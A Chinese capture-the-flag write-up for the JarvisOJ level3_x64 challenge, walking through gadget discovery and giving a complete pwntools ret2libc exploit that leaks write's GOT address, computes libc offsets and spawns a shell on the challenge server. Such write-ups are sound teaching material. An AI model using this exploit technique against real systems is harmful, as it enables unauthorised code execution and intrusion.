JarvisOJ level3_x64

这题和level3大同小异,只不过这一题是x64的程序

做这题之前,建议先写level2_x64。
拿到这题,我们首先查看保护:
JarvisOJ level3_x64
程序只开了NX保护,好的。
根据做过level3的经验,我们先找出我们需要的地址(也可以用pwntools工具自动找):
vul()函数:
JarvisOJ level3_x64
write()函数的plt地址:
JarvisOJ level3_x64
之后我们找齐需要用的gadget:
JarvisOJ level3_x64
但是我们并没有找到pop rdx ; ret,根据我们对write函数的了解,最后一个参数是用来控制长度的,所以,只要rdx寄存器的长度大于0x8就没有问题:
我们看一下:
JarvisOJ level3_x64
我们通过GDB查看一下,运行时,rdx的值为0x200,这是完全足够的,我们就不需要控制他并对其赋值了。
做好以上准备之后,我们就可以来构造payload了,因为本题与level3的payload大同小异,在此就不详细讲构造过程了,直接给出完整的exp:

#!/usr/bin/env python
from pwn import *
p=remote('pwn2.jarvisoj.com','9883')
elf=ELF('./level3_x64')
libc=ELF('./libc-2.19.so')
write_plt=elf.symbols['write']
write_got=elf.got['write']
vul_addr=0x04005e6
pop_rdi_addr=0x04006b3
pop_rsi_addr=0x04006b1
payload='A'*0x80+'A'*8+p64(pop_rdi_addr)+p64(1)+p64(pop_rsi_addr)+p64(write_got)+p64(0x0)+p64(write_plt)+p64(vul_addr)
p.recvuntil('Input:\n')
p.send(payload)
write_addr=u64(p.recv(8))
print "write_addr="+hex(write_addr)
write_libc=libc.symbols['write']
libc_eee=write_addr-write_libc
sys_libc=libc.symbols['system']
sh_libc=libc.search('/bin/sh').next()
sys_addr=libc_eee+sys_libc
sh_addr=libc_eee+sh_libc
p.recvuntil('Input:\n')
payload1='A'*0x80+'A'*8+p64(pop_rdi_addr)+p64(sh_addr)+p64(sys_addr)+'A'*8
p.send(payload1)
p.interactive()

运行结果:
JarvisOJ level3_x64

上一篇:BugkuCTF pwn overflow2


下一篇:2021-05-02